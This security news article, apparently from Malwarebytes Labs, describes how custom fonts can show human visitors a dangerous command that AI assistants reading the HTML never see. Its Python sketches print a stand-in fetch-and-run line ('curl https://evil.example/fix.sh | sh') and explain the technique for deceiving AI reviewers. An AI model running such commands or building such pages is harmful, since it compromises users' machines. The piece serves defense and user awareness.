AI Security - Researchers Expose Font Trick That Hides Malicious Commands
Basically, researchers found a way to use custom web fonts to hide malicious commands from AI assistants.
Researchers have found a way to trick AI assistants into overlooking malicious commands. This poses a real risk for anyone who relies on AI to check whether a command is safe. The major platforms have been alerted, but their responses so far have been inadequate. Stay vigilant and verify commands yourself before executing them.
What Happened
Researchers have developed a proof-of-concept (PoC) that exploits custom fonts to deceive popular AI assistants like ChatGPT and Google’s Gemini. The method lets attackers place dangerous instructions on a web page in a form that is invisible to the AI yet plainly visible to human visitors. Imagine a book printed in a trick typeface: the reader sees one message on the page, while anyone working from the raw manuscript (the AI, in this case) sees something else entirely.
The implications are alarming. If a user asks an AI assistant if a command on a suspicious webpage is safe, the AI may respond positively, unaware of the hidden malicious instructions. This could lead to the execution of harmful commands that compromise the user's device, all while the AI remains oblivious to the danger.
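To make that mismatch concrete, here is a minimal Python sketch of the two views. The URL is invented, and ROT13 stands in for the font's letter-for-letter glyph swap; in a real attack the swap lives in the font file's glyph outlines, where no HTML parser can see it.

```python
import codecs

# What the victim sees on screen, drawn by the attacker's custom font
# (the URL is made up for this example):
displayed = "curl https://evil.example/fix.sh | sh"

# What the page's HTML actually contains, and therefore everything an
# AI assistant reading the source gets to see. ROT13 models the font's
# one-to-one glyph substitution here; a real PoC would also choose a
# mapping whose underlying text looks plausible rather than garbled.
in_the_html = codecs.encode(displayed, "rot13")

print("AI assistant reads:", in_the_html)  # phey uggcf://rivy.rknzcyr/svk.fu | fu
print("Human visitor sees:", displayed)
```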
Who's Affected
This vulnerability affects users of popular AI assistants that rely on web content for decision-making. With the increasing integration of AI in everyday tasks, many individuals may unwittingly become victims of this attack. The major AI platforms, including Microsoft and Google, have been informed of this vulnerability. However, their responses have been disappointing, with many providers dismissing the report as outside their security scope.
Only Microsoft and Google showed initial interest in addressing the issue, but even Google later downplayed the severity, closing the report without action. This leaves users exposed to potential attacks that exploit this vulnerability.
Tactics & Techniques
The attack combines a custom font with Cascading Style Sheets (CSS) to create a deceptive display. The underlying HTML, which is all the AI reads, contains harmless text, while the custom font renders that same text to the human visitor as a different, more dangerous command. The tactic relies heavily on social engineering: attackers count on users trusting their AI assistant's verdict instead of verifying the command themselves.
To illustrate, a malicious webpage might instruct a user to execute a command that could lead to a system compromise. If the AI assistant checks the page, it may only see the harmless version and mislead the user into thinking it's safe. This highlights the critical need for users to remain vigilant and not solely rely on AI for security assessments.
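The page itself can look perfectly ordinary. The sketch below (the font URL, class name, and commands are all invented) shows the kind of structure such a page might use, and why a plain text extraction of the HTML, roughly what an AI assistant works from, never surfaces the command the visitor actually sees.

```python
import re

# Hypothetical page: the custom font is declared in CSS, and the
# "command" in the HTML is the underlying text a parser would read.
page = """
<style>
  @font-face { font-family: 'Remap';  /* invented font name */
               src: url('https://evil.example/remap.woff2'); }
  .cmd { font-family: 'Remap', monospace; }
</style>
<p>Run this command to verify your download:</p>
<code class="cmd">phey uggcf://rivy.rknzcyr/svk.fu | fu</code>
"""

# Crude stand-in for how an AI pipeline might turn the page into text:
no_style = re.sub(r"<style>.*?</style>", " ", page, flags=re.S)
ai_view = " ".join(re.sub(r"<[^>]+>", " ", no_style).split())
print(ai_view)
# -> Run this command to verify your download: phey uggcf://rivy.rknzcyr/svk.fu | fu
#
# The 'Remap' font draws those characters on screen as
#   curl https://evil.example/fix.sh | sh
# so the visitor sees a shell command the AI never encountered.
```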
How to Protect Yourself
To safeguard against this type of attack, users should take proactive measures. Here are some essential tips:
- Copy and paste the exact command you plan to run, rather than relying on the AI's interpretation of a webpage (see the sketch after this list).
- Be cautious with any site that prompts you to execute commands, especially in terminal environments.
- Trust your instincts; if something feels off, it’s better to pause and reassess.
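For the first tip, it helps to be able to see what a page's HTML actually says, independent of any font tricks. A minimal sketch, assuming only the Python standard library (the URL is a placeholder): it dumps the text an HTML parser extracts, which is roughly what an AI assistant gets, so you can compare it against what your browser displays.

```python
import urllib.request
from html.parser import HTMLParser

class TextDump(HTMLParser):
    """Collect visible text nodes, skipping <script>/<style> contents."""
    def __init__(self):
        super().__init__()
        self.hidden = 0      # nesting depth inside script/style elements
        self.chunks = []
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.hidden += 1
    def handle_endtag(self, tag):
        if tag in ("script", "style") and self.hidden:
            self.hidden -= 1
    def handle_data(self, data):
        if self.hidden == 0 and data.strip():
            self.chunks.append(data.strip())

url = "https://example.com/suspicious-page"   # placeholder URL
raw = urllib.request.urlopen(url).read().decode("utf-8", "replace")
dumper = TextDump()
dumper.feed(raw)
print("\n".join(dumper.chunks))
# If a command shown on screen is missing here, or reads differently,
# the page is telling you and the AI two different stories: don't run it.
```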
Additionally, tools like the Malwarebytes Browser Guard can help by warning users if a website attempts to manipulate clipboard content. Keeping an up-to-date anti-malware solution will also provide protection against known malicious sites. If in doubt, consult tools like Malwarebytes Scam Guard to verify the legitimacy of suspicious websites.
Malwarebytes Labs